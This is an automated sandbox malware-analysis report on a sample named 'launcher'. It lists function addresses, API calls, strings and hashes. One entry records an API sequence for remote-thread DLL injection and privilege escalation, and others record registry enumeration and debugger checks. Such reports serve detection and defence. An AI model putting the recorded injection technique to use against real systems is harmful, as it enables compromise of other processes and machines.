Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: e53655bb34f470fb976c1ea41d601b90a079669071ef2deb5d7a55e824bc1c6c
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 4A1169796217C182FB21D731F9067ED62D0BB96308F440229AE1F8D197EF3DC08A8600

Function 000001EDF1664ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001EDF1664ED4
VirtualProtect.KERNEL32 ref: 000001EDF1664F17
FlushInstructionCache.KERNEL32 ref: 000001EDF1664F2C

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
Instruction ID: 953f86758d8e3dd5f16c6594aefadb4d7db65b39c6b886464ac79dc3c33a8591
Opcode Fuzzy Hash: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
Instruction Fuzzy Hash: 42F0BD76218AC481D630DB25F45178E67E0E3D97D4F140515BD8E0BB6BCE39C5828B04

Function 00007FF77E088D0F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF77E081070: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E081094
Part of subcall function 00007FF77E081070: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E0810B5

system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF77E088D29

Strings

pause, xrefs: 00007FF77E088D22

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintfsystem
String ID: pause
API String ID: 498820738-3617231597
Opcode ID: b31a80fabaeb6fe3e8b0a3a0469dab0a1c1d8ac833396b7ea79f2445031033ec
Instruction ID: 117643a1053ee3115737660a15547a5f00338c4c7c61fde7c6e96109e55e7c15
Opcode Fuzzy Hash: b31a80fabaeb6fe3e8b0a3a0469dab0a1c1d8ac833396b7ea79f2445031033ec
Instruction Fuzzy Hash: 8CF06227A3458185E650EB25D8552EDA326EB48794FA01032CD0D43655CF3DE982C760

Function 000001EDF166D97C Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001EDF166D9F5
GetFileType.KERNEL32 ref: 000001EDF166DA0B

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
Instruction ID: f0e30d7fadc922565bf621f8d8d966c877abf600324e744df6c164fbf7eccbb1
Opcode Fuzzy Hash: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
Instruction Fuzzy Hash: D7315232618B8491EB64CB25E5902AC7691F746BA4F681319DFAB4B3E3CB35D492D340

Function 000001EDF1661C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001EDF1661650: GetProcessHeap.KERNEL32 ref: 000001EDF166165B
Part of subcall function 000001EDF1661650: HeapAlloc.KERNEL32 ref: 000001EDF166166A
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF16616DA
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661707
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF1661721
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661741
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF166175C
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF166177C
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF1661797
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF16617B7
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF16617D2
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF16617F2

Sleep.KERNEL32 ref: 000001EDF1661C43
SleepEx.KERNELBASE ref: 000001EDF1661C49

Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF166180D
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF166182D
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF1661848
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661868
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF1661883
Part of subcall function 000001EDF1661650: RegOpenKeyExW.ADVAPI32 ref: 000001EDF16618A3
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF16618BE
Part of subcall function 000001EDF1661650: RegCloseKey.ADVAPI32 ref: 000001EDF16618C8

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: e51e1803ca4490e2d944ab709a85e9fde9509195750297c11388986ec3edbad2
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 6331C076200A8191FB50EF36FA413DE13E5ABD6BD5F185022DE0BCF6D7EE24C8528290

Function 00007FF77E081070 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E081094
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E0810B5

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: b7263e2c4cc74f450f8c1cae55fd00addfe8cf68eb9ea4d9b791b75959571e23
Instruction ID: e9608b391cffb1d9e3d7eb6ce0711e873e6204a0bf8cfeca0f95bc29b5a935d0
Opcode Fuzzy Hash: b7263e2c4cc74f450f8c1cae55fd00addfe8cf68eb9ea4d9b791b75959571e23
Instruction Fuzzy Hash: B1E01532A18B8592D600EB50F80455AA7A4FB98BC4FA08035EA8847A28CF7CD1A4CB50

Function 000001EDF1663930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000001EDF1663948

Strings

dialer, xrefs: 000001EDF1663941

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 6b23d79f0dae2caccdb227705e9155ddec6cdaae2ca4d5494b4c31bc7a59ba96
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: D6D05E3031128B86EB14DFB1F8812A82390AB06715F4882208E0606117EB18C98ECB10

Function 000001EDF1632908 Relevance: 1.4, APIs: 1, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001EDF16329AA

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: e27949f4b344ed905b4ce4d8998e6402ed4f8fa077a82c136b864b7478046f58
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 4F619E7270169187EA68CF29E4507ADB3D1FB45B98F54812D9E1B07787DB38E893C704

Function 000001EDF166B860 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000001EDF166B8B5

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: 701edd8905f600f81215a39afb77d7f3a2505f70837476198dca0633f0b8fa48
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 0DF044B030168589FE54EB76F8103ED12C46F9AB80F0959388D0B8B2C3EE2CC4878210

Non-executed Functions

Function 00007FF77E0885B0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 194threadinjectionsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E0901A0: char_traits.LIBCPMTD ref: 00007FF77E0901E2

GetCurrentProcess.KERNEL32 ref: 00007FF77E08863E
OpenProcessToken.ADVAPI32 ref: 00007FF77E088650
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E0886A5
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E0886B0
CreateProcessAsUserA.ADVAPI32 ref: 00007FF77E0886F0

Part of subcall function 00007FF77E0863D0: __std_fs_code_page.MSVCPRT ref: 00007FF77E0862D4
Part of subcall function 00007FF77E0863D0: __std_fs_convert_wide_to_narrow.LIBCPMT ref: 00007FF77E08631A
Part of subcall function 00007FF77E0863D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E086370
Part of subcall function 00007FF77E0863D0: __std_fs_convert_wide_to_narrow.LIBCPMT ref: 00007FF77E086385

GetModuleHandleW.KERNEL32 ref: 00007FF77E088718
GetProcAddress.KERNEL32 ref: 00007FF77E088731
VirtualAllocEx.KERNEL32 ref: 00007FF77E088780
WriteProcessMemory.KERNEL32 ref: 00007FF77E0887CA
CreateRemoteThread.KERNEL32 ref: 00007FF77E0887EE
VirtualFreeEx.KERNEL32 ref: 00007FF77E08880B
Sleep.KERNEL32 ref: 00007FF77E088851
ResumeThread.KERNEL32 ref: 00007FF77E08885B
CloseHandle.KERNEL32 ref: 00007FF77E088865
CloseHandle.KERNEL32 ref: 00007FF77E08886F

Strings

kernel32.dll, xrefs: 00007FF77E088711
LoadLibraryA, xrefs: 00007FF77E088727
Privilege escalation failed!, xrefs: 00007FF77E08865A

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Process$Concurrency::details::EmptyHandleQueue::StructuredWork$CloseCreateThreadVirtual__std_fs_convert_wide_to_narrow$AddressAllocCurrentFreeMemoryModuleOpenProcRemoteResumeSleepTokenUserWrite__std_fs_code_pagechar_traits
String ID: LoadLibraryA$Privilege escalation failed!$kernel32.dll
API String ID: 1303043951-1637018885
Opcode ID: e09e7428da5b09cbdf3906fc2b2ce18fc527b7a5eda6e1c396fddc440957de53
Instruction ID: 84e255944ff85dfa8b8ea51a9920373f7649e2a35a58c8cefbe4f6c75553d32a
Opcode Fuzzy Hash: e09e7428da5b09cbdf3906fc2b2ce18fc527b7a5eda6e1c396fddc440957de53
Instruction Fuzzy Hash: 5A81C123E38A8685FB00EBA1D8146BDA3A1FB99B98FA05134DE4D17695DF3CF545C320

Function 00007FF77E09FA8C Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF77E09FB39
GetLastError.KERNEL32 ref: 00007FF77E09FB43
FindFirstFileW.KERNEL32 ref: 00007FF77E09FB5A
GetLastError.KERNEL32 ref: 00007FF77E09FB66
FindClose.KERNEL32 ref: 00007FF77E09FB74
__std_fs_open_handle.LIBCPMT ref: 00007FF77E09FC07
CloseHandle.KERNEL32 ref: 00007FF77E09FC1D
CloseHandle.KERNEL32 ref: 00007FF77E09FD9A
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E09FDA4

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleterminate
String ID:
API String ID: 2940733389-0
Opcode ID: b1de9eafa4654c92652567bc84fe2940ad1dd13fa91027991c29f740f1bc6f63
Instruction ID: 96cbac665da7f352def939ea502d487532455804293f6b9e3fda936ba8040a7e
Opcode Fuzzy Hash: b1de9eafa4654c92652567bc84fe2940ad1dd13fa91027991c29f740f1bc6f63
Instruction Fuzzy Hash: 7791A433B38A024AE664AF65A81467AA291AF45BB4FB44330D9BE476D4DF3CF415C720

Function 000001EDF1667E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001EDF1667E8C
RtlCaptureContext.NTDLL ref: 000001EDF1667EB9
RtlLookupFunctionEntry.NTDLL ref: 000001EDF1667ED3
RtlVirtualUnwind.NTDLL ref: 000001EDF1667F14
IsDebuggerPresent.KERNEL32 ref: 000001EDF1667F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EDF1667F89
UnhandledExceptionFilter.KERNEL32 ref: 000001EDF1667F94

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: d6603789441c6d8b9f2890209b4262af3fd94c2c3b465beeb55d85b822cccd5f
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 41313872204BC08AEB60CF74F8507ED63A4F785748F44452ADA4E4BB9AEF38C649C710

Function 000001EDF166B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001EDF166B585
RtlLookupFunctionEntry.NTDLL ref: 000001EDF166B59D
RtlVirtualUnwind.NTDLL ref: 000001EDF166B5D8
IsDebuggerPresent.KERNEL32 ref: 000001EDF166B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EDF166B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001EDF166B626

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 5ff90092a1cbc92b269cba69fb6f39b2adc1daed405b5ab1e390aa4d756270b1
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: B1310836214B8096DB60CF35F8503DE73A4F78A798F544216EE9E46B96DF38C5568B00

Function 000001EDF166FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001EDF166FF67
WriteFile.KERNEL32 ref: 000001EDF167021E
WriteFile.KERNEL32 ref: 000001EDF1670270
GetLastError.KERNEL32 ref: 000001EDF1670372
GetLastError.KERNEL32 ref: 000001EDF16703D2

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 71f35be29094ce5d5ed5f83592c3806e7c7838466ae5c7ef897c081f25db6a63
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 17E1AB72A18AC09AE701CF74F4842DE7BB1F346798F144216EE4A97B9BDA39C51BC700

Function 00007FF77E09FE34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,00007FF77E085BCA), ref: 00007FF77E09FE5A
FormatMessageA.KERNEL32 ref: 00007FF77E09FE89

Strings

!x-sys-default-locale, xrefs: 00007FF77E09FE4D

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: fd471b6550d0f3135fc661d69bcd9813ed394a050990605dbb1785040206e430
Instruction ID: 64ec16e0e2ade8be53de0bbd5cc067b0215d6912452ec8a5beb766f0ca2c55a5
Opcode Fuzzy Hash: fd471b6550d0f3135fc661d69bcd9813ed394a050990605dbb1785040206e430
Instruction Fuzzy Hash: 6C019E73B2878986E7109B62F4407BEE7A1F789784FA44135E64902B99CF3CE555CB20

Function 000001EDF16612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EDF1661326
GetProcessHeap.KERNEL32 ref: 000001EDF1661334
HeapAlloc.KERNEL32 ref: 000001EDF1661345
RegEnumValueW.ADVAPI32 ref: 000001EDF16613A1

Part of subcall function 000001EDF1661554: StrCmpIW.SHLWAPI ref: 000001EDF1661585

GetProcessHeap.KERNEL32 ref: 000001EDF16613E9
HeapAlloc.KERNEL32 ref: 000001EDF16613F7
GetProcessHeap.KERNEL32 ref: 000001EDF166141B
HeapFree.KERNEL32 ref: 000001EDF1661429
lstrlenW.KERNEL32 ref: 000001EDF1661432
GetProcessHeap.KERNEL32 ref: 000001EDF1661440
HeapAlloc.KERNEL32 ref: 000001EDF166144E
StrCpyW.SHLWAPI ref: 000001EDF1661470
GetProcessHeap.KERNEL32 ref: 000001EDF1661485
HeapFree.KERNEL32 ref: 000001EDF1661493

Strings

d, xrefs: 000001EDF1661365

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 75b93d7e576fca1200d7dfb95ca417adbd2abe50d30f96af86ea5c36d860f2fa
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 3E514972214B8497EB14CB62F54439EB3E1F78AB85F048225DE4A07B16DF38C056C740

Function 00007FF77E08DCD0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 203COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E08DD10
char_traits.LIBCPMTD ref: 00007FF77E08DD66
char_traits.LIBCPMTD ref: 00007FF77E08DDD4
char_traits.LIBCPMTD ref: 00007FF77E08DE50
char_traits.LIBCPMTD ref: 00007FF77E08DE6B
char_traits.LIBCPMTD ref: 00007FF77E08DF1D
char_traits.LIBCPMTD ref: 00007FF77E08DF38
char_traits.LIBCPMTD ref: 00007FF77E08DFB2
char_traits.LIBCPMTD ref: 00007FF77E08DFCD

Part of subcall function 00007FF77E08B6C0: allocator.LIBCONCRTD ref: 00007FF77E08B77B

Strings

; expected , xrefs: 00007FF77E08DFAB, 00007FF77E08DFBA
syntax error , xrefs: 00007FF77E08DD09, 00007FF77E08DD18
unexpected , xrefs: 00007FF77E08DF16, 00007FF77E08DF25
while parsing , xrefs: 00007FF77E08DD5F, 00007FF77E08DD6E
; last read: ', xrefs: 00007FF77E08DE64, 00007FF77E08DE73

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$allocator
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 132031878-4239264347
Opcode ID: 12a69e48375e76d4d0a34445702dc66c37604db4de8fd28ccd615f32ffcb8892
Instruction ID: 39d88a1536842983399a75101c147ff2450572f6a3a3228206ff375dc14023e3
Opcode Fuzzy Hash: 12a69e48375e76d4d0a34445702dc66c37604db4de8fd28ccd615f32ffcb8892
Instruction Fuzzy Hash: 40911E63B3855259FB00FBA1D4502EDA762EF51788FD04531EA0E5769ADF3CE909C360

Function 00007FF77E0881E0 Relevance: 24.2, APIs: 16, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E090480: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF77E0904BF
Part of subcall function 00007FF77E090480: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF77E0904E3
Part of subcall function 00007FF77E090480: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77E090541

??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF77E088262
?exceptions@ios_base@std@@QEAAXH@Z.MSVCP140 ref: 00007FF77E08828C
memset.VCRUNTIME140 ref: 00007FF77E0882A2
??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF77E0882CD
??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF77E0882EF
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF77E088332
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF77E088374
?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E0883B6
?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E0883D4
?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E0883F9

Part of subcall function 00007FF77E082C30: ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF77E082CB0

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

